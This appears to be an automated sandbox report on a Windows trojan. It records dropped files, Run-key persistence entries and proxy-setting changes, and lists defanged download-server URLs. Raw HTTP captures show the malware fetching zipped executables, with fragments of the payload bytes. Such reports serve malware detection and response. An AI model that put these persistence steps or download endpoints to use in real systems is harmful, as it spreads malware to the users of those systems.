MD5: bc5ae6bb52956d8da7f7af3cdbf14683
SHA1: f538ce86b89702f9b778ee76607177bd7b802d2c
SHA256: a61a9d0ba14890b9459b2e9a2869d63ffdcbe2ce931fe45c9ef94a8eed692be0
SSDeep: 98304:A9hVm8Tf4RCjIW/qfUEoviVbwEEMweSgdpGJpuand026lf3SjhOyi:AX08TfkCjb/PxLEhyLph36lfSYyi
Size: 4839936 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2016-09-16 19:40:46
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

wbmoney.exe:1256
wbmoney.exe:2052
wbmoney.exe:3752
wbmoney.exe:3460
%original file name%.exe:2604
setmss.exe:644
setmss.exe:3440
LLVier.exe:472
LLVier.exe:1612
LLVier.exe:3352

The Trojan injects its code into the following process(es):

setmss.exe:3368

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process wbmoney.exe:3752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016112620161127\index.dat (16 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F5BEJ4YJ\flowtips[1].htm (2862 bytes)

The process %original file name%.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Fonts\win\LLVier.exe (424 bytes)
C:\Windows\wbmoney.exe (614 bytes)
C:\Windows\LLViewer.exe (2 bytes)
C:\Windows\Fonts\win\setmss.exe (2 bytes)
C:\Windows\updatezb.exe (196 bytes)
C:\Windows\Fonts\win\TTHB.bat (5 bytes)
C:\Windows\TbViewer.exe (3 bytes)
C:\Windows\Config.ini (155 bytes)
C:\ .bat (113 bytes)
C:\Windows\Fonts\win\TB.bat (223 bytes)
C:\Windows\Alexa.dll (1 bytes)

The process setmss.exe:3368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\1_0_ttbrowser.exe[1].zip (1133516 bytes)
C:\Windows\Fonts\win\1_0_ttbrowser.exe.zip (950255 bytes)
C:\Windows\Fonts\win\update.txt (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ttll\vest3368\Cookies\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\update_stworker[1].txt (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ttll\vest3368\Cookies\R2QLPNUL.txt (116 bytes)

The Trojan deletes the following file(s):

C:\Windows\Fonts\win\update.txt (0 bytes)

The process setmss.exe:644 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest644\Cookies (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest644\Cache (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest644 (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest644\History (0 bytes)

The process setmss.exe:3440 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest3440 (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest3440\Cookies (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest3440\History (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest3440\Cache (0 bytes)

The process LLVier.exe:3352 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Fonts\win\browser\QtCore4.dll (77238 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\1_0_QtGui4.dll[1].zip (264629 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XDZVB81J.txt (113 bytes)
C:\Windows\Fonts\win\1_0_browser.exe.zip (29536 bytes)
C:\Windows\Fonts\win\LLVier.exe (15168 bytes)
C:\Windows\Fonts\win\1_0_QtGui4.dll.zip (227889 bytes)
C:\Windows\Fonts\win\browser\browser.exe (10136 bytes)
C:\Windows\Fonts\win\update.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\1_0_browser.exe[1].zip (35992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\1_0_º£ÂíÁ÷Á¿.exe[1].zip (48658 bytes)
C:\Windows\Fonts\win\1_0_º£ÂíÁ÷Á¿.exe.zip (44168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\1_0_QtCore4.dll[1].zip (254212 bytes)
C:\Windows\Fonts\win\1_0_QtCore4.dll.zip (210446 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\update_hmflower[1].txt (609 bytes)

The Trojan deletes the following file(s):

C:\Windows\Fonts\win\1_0_browser.exe.zip (0 bytes)
C:\Windows\Fonts\win\update.txt (0 bytes)
C:\Windows\Fonts\win\1_0_QtCore4.dll.zip (0 bytes)
C:\Windows\Fonts\win\1_0_º£ÂíÁ÷Á¿.exe.zip (0 bytes)

Registry activity

The process wbmoney.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\llzb]
"LastTime" = "1480156603"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASAPI32]
"FileTracingMask" = "4294901760"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASAPI32]
"MaxFileSize" = "1048576"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASMANCS]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wbmoney.exe:2052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 30 D1 72 FA D0 47 D2 01"
"{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 FA BF C3 FA D0 47 D2 01"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage]
"StartMenu_Start_Time" = "51 F5 79 FA D0 47 D2 01"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 0D A2 58 FA D0 47 D2 01"
"{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 78 3A BA FA D0 47 D2 01"
"{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2} {BDDACB60-7657-47AE-8445-D23E1ACF82AE} 0xFFFF" = "01 00 00 00 00 00 00 00 B1 56 7C FA D0 47 D2 01"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{85BBD920-42A0-1069-A2E4-08002B30309D} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 12 B8 7E FA D0 47 D2 01"
"{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 B1 56 7C FA D0 47 D2 01"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

The process wbmoney.exe:3752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\IETld]
"IETldDllVersionLow" = "531644475"
"StaleIETldCache" = "1"

[HKU\.DEFAULT\Software\Local AppWizard-Generated Applications\?????????\Setting]
"lastrun" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016112620161127]
"CacheLimit" = "8192"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016112620161127]
"CacheRepair" = "0"
"CachePrefix" = ":2016112620161127:"
"CachePath" = "%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016112620161127"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\IETld]
"IETldVersionHigh" = "1"

[HKU\.DEFAULT\Software\llzb]
"LastTime" = "1480156616"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{FF393560-C2A7-11CF-BFF4-444553540000} {000214E6-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 03 77 07 07 D1 47 D2 01"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\IETld]
"IETldDllVersionHigh" = "589824"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\IETld]
"IETldVersionLow" = "7"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016112620161127]
"CacheOptions" = "11"

[HKU\.DEFAULT\Software\Local AppWizard-Generated Applications\?????????\Setting]
"UsrID" = "732196"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\BrowserEmulation]
"TLDUpdates" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wbmoney.exe:3460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
"AutoDetect" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

The process setmss.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASMANCS]
"MaxFileSize" = "1048576"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SEOWorker2014" = "C:\Windows\Fonts\win\setmss.exe -autorun"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process setmss.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"SEOWorker2014" = "C:\Windows\Fonts\win\setmss.exe -autorun"

The Trojan deletes the following registry key(s):

[HKU\.DEFAULT\Software\Ó¦ÓóÌÐòÏòµ¼Éú³ÉµÄ±¾µØÓ¦ÓóÌÐò\???\Recent File List]

The process setmss.exe:3440 makes changes in the system registry.
The Trojan deletes the following registry key(s):

[HKU\.DEFAULT\Software\Ó¦ÓóÌÐòÏòµ¼Éú³ÉµÄ±¾µØÓ¦ÓóÌÐò\???\Recent File List]

The process LLVier.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"HMFlower2016" = "C:\Windows\Fonts\win\LLVier.exe -autorun"

The Trojan deletes the following registry key(s):

[HKU\.DEFAULT\Software\Local AppWizard-Generated Applications\???\Recent File List]

The process LLVier.exe:1612 makes changes in the system registry.
The Trojan deletes the following registry key(s):

[HKU\.DEFAULT\Software\HaiMaSoft\???\Recent File List]

The process LLVier.exe:3352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASAPI32]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HMFlower2016" = "C:\Windows\Fonts\win\LLVier.exe -autorun"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://update.ttliuliang.com/update/107872/update/update_stworker.txt?rnd=1480156597	162.159.227.238
hxxp://update.haimarj.com/update/100006/update/update_hmflower.txt?rnd=1480156601	162.159.208.75
hxxp://update.haimarj.com/update/100006/update/1_0_272243302355301367301277.exe.zip?rnd=1480156602	162.159.208.75
hxxp://update.ttliuliang.com/update/107872/update/1_0_ttbrowser.exe.zip?rnd=1480156603	162.159.227.238
hxxp://update.haimarj.com/update/100006/update/1_0_browser.exe.zip?rnd=1480156609	162.159.208.75
hxxp://down.9935.org/gj/ver.txt	222.187.253.99
hxxp://www.4345.cc/rj/flowtips.html	125.77.197.140
hxxp://update.haimarj.com/update/100006/update/1_0_QtCore4.dll.zip?rnd=1480156620	162.159.208.75
hxxp://yd.ecoma.ourwebpic.com/
hxxp://cdn.sp.cdntip.com/ic.asp
hxxp://update.haimarj.com/update/100006/update/1_0_QtGui4.dll.zip?rnd=1480156636	162.159.208.75
hxxp://6688.9935.org/ClientAPI/flowtaskAPIV1.aspx?ran=180620906	115.159.33.110
hxxp://x1.2466.cc/ClientAPI/StatisticsUserAPI.aspx?ran=1763564114	222.76.214.142
hxxp://www.ip138.com/	87.245.198.83
hxxp://1212.ip138.com/ic.asp	1.31.173.43
hxxp://update.haimarj.com/update/100006/update/1_0_.........exe.zip?rnd=1480156602	162.159.208.75

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /ic.asp HTTP/1.1

Accept: */*

Connection: Keep-Alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Host: 1212.ip138.com

HTTP/1.1 200 OK

Server: Microsoft-IIS/6.0

Connection: keep-alive

Date: Sat, 26 Nov 2016 10:37:15 GMT

Content-Type: text/html

Content-Length: 219

X-Powered-By: ASP.NET

Set-Cookie: ASPSESSIONIDCQQQQQRR=DBJOPAHDAIGIONEPBEIBLFPD; path=/

X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[194.242.96.218] ............</center></body></htm
l>HTTP/1.1 200 OK..Server: Microsoft-IIS/6.0..Connection: keep-aliv
e..Date: Sat, 26 Nov 2016 10:37:15 GMT..Content-Type: text/html..Conte
nt-Length: 219..X-Powered-By: ASP.NET..Set-Cookie: ASPSESSIONIDCQQQQQR
R=DBJOPAHDAIGIONEPBEIBLFPD; path=/..X-Daa-Tunnel: hop_count=1..<htm
l>..<head>..<meta http-equiv="content-type" content="text/
html; charset=gb2312">..<title> ....IP.... </title>..&l
t;/head>..<body style="margin:0px"><center>....IP....[1
94.242.96.218] ............</center></body></html>font>....


GET /ic.asp HTTP/1.1

Accept: */*

Connection: Keep-Alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Host: 1212.ip138.com

Cookie: ASPSESSIONIDCQQQQQRR=DBJOPAHDAIGIONEPBEIBLFPD

HTTP/1.1 200 OK

Server: Microsoft-IIS/6.0

Connection: keep-alive

Date: Sat, 26 Nov 2016 10:37:30 GMT

Content-Type: text/html

Content-Length: 219

X-Powered-By: ASP.NET

Set-Cookie: ASPSESSIONIDSAQBBBQD=CNGHNNEBMCPGBIKNNHHLNDFH; path=/

X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[194.242.96.218] ............</center></body></htm
l>HTTP/1.1 200 OK..Server: Microsoft-IIS/6.0..Connection: keep-aliv
e..Date: Sat, 26 Nov 2016 10:37:30 GMT..Content-Type: text/html..Conte
nt-Length: 219..X-Powered-By: ASP.NET..Set-Cookie: ASPSESSIONIDSAQBBBQ
D=CNGHNNEBMCPGBIKNNHHLNDFH; path=/..X-Daa-Tunnel: hop_count=1..<htm
l>..<head>..<meta http-equiv="content-type" content="text/
html; charset=gb2312">..<title> ....IP.... </title>..&l
t;/head>..<body style="margin:0px"><center>....IP....[1
94.242.96.218] ............</center></body></html>..

GET /update/100006/update/update_hmflower.txt?rnd=1480156601 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: update.haimarj.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 26 Nov 2016 10:36:42 GMT

Content-Type: text/plain

Content-Length: 1298

Connection: keep-alive

Set-Cookie: __cfduid=d387a695a86ee3c45fcb2926575c1c5941480156602; expires=Sun, 26-Nov-17 10:36:42 GMT; path=/; domain=.haimarj.com; HttpOnly

Content-Encoding: gzip

Last-Modified: Wed, 14 Sep 2016 14:17:06 GMT

Accept-Ranges: bytes

ETag: "3c9d36ac92ed21:0"

Vary: Accept-Encoding

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 307cb36c67c84efc-DME
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"........._......].>xvrz.{zr.
....g..'...<8}x..........O>.y...~.............8...U.............
O..?..?.9}p.......<;~.......'.w..<}..Az/....=..|.< .......>
;<.y..C.....|z.`....`..............3...............=8=~.p..........
}.p........{...?.....'..{...E.^U.[.........'...O...={z....s..........N
.>}...q_a..v.~7..^E._..>}........D...>}......O.vvv....~......
..S....B-.I.]...7.......NNv..?}..t........1usz.`.....O....2P...f......
...{.N.=<..?8~zr..).............<.....{.0.7C...rZ.....t...`....O
....<;x.......O.?y..r..d...........o.a......'.9O.=....;%.z.l...';..
<8..Nh.......o.0W...X6.........E.....O.<=.G.8=y..wo..S.<9&R|.
.............<.N.w7w.....i.p...J.~.d.S..........O..P_...<.....n.
w7w.. ....{....>..;..w..|r.......;{."N.?...{........M...n.K....'...
....?..S......w...<%......{{O..~....t......V.|I...Wsy...yz....s....
...{.N..>|..d......O>}..{..4.h.......E~^............=.1<{vL.{
...c....~Jz......=............:...m.......{..v...<9.....!M....O...x
.t.......k.....m....{.w.I@.<$..;.ON..B.......vN....{.]..n..b)m..g.{
.w?}p..m.....=........pvOvI..Q..n..O.ri.....I..z..xo.....4.'....J.to..
....{......m:!...........v.I2?%sr.lo..6......O....;89.>.k......HO..
...zv.....$.4..N.=.....r..G..{B...ta^....&'..........
<<< skipped >>>

GET /update/100006/update/1_0_.........exe.zip?rnd=1480156602 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: update.haimarj.com

Connection: Keep-Alive

Cookie: __cfduid=d387a695a86ee3c45fcb2926575c1c5941480156602

HTTP/1.1 200 OK

Date: Sat, 26 Nov 2016 10:36:43 GMT

Content-Type: application/x-zip-compressed

Content-Length: 190036

Connection: keep-alive

Last-Modified: Sun, 11 Sep 2016 11:57:00 GMT

Accept-Ranges: bytes

ETag: "7ddc889a23cd21:0"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 307cb37124444efc-DME
PK.......... I.1N......................exeUT....F.W.F.W.F.W.:{|T.....I
&0I.0...0..g~k..*...t.Q ..&T`...:*.8.>....f.:4V..[W`...u.t.nA,.H$.-
....I.D.....T.X..s.w..Ww...?s..s.w^.y}.......1...d...L>...~..c...(d
...O..,:>i.........h....kV.[.x.}.....u....=K...._.....a.).5..gD.ox.
....k............?.?...~....,...;.. .4.H.....>W......|...O.. ...^xO
}.C~..c.?....5...;7...-RT..w.{u.w..)..\.v... .....k..E.^....'c.7k..c.X
.S3a-..W.T.{..[~......\..0..{......O.<.T.../......K=n.j.lX.:.....".
>.|g=...)..9W..sdb..7]b..'6.A...9...(..<6..=C..3..=C..3..=C..3..
..p......v...........S$t....1........c.1..x...E..6V...6.....,D3={...f~
.g...^...g..f/8.....*k.-..~4.5..w......D.....d4P.QYss..|..'#.....WT..}
fB......z.....#....7..G}s_~.g.Kc.C.....`.v.H.....L........M.C<.....
2...x.....}....'^.8..El#@C@....#..z.l...G.......Ej...h.......#........
..Y.}...\.,.....Gu._U.....J..O.}%2....{...........W..|.x...U6=.Y.....U
s.......d8..t.....ds....x.,V..jl|..R.S.y..!...._.;.~.w....3...Q'......
Z.,..a#@X,..B6.Q.G..(k/Q.STeJ..D]...u..J..b...r,..`...P.A.H........(..
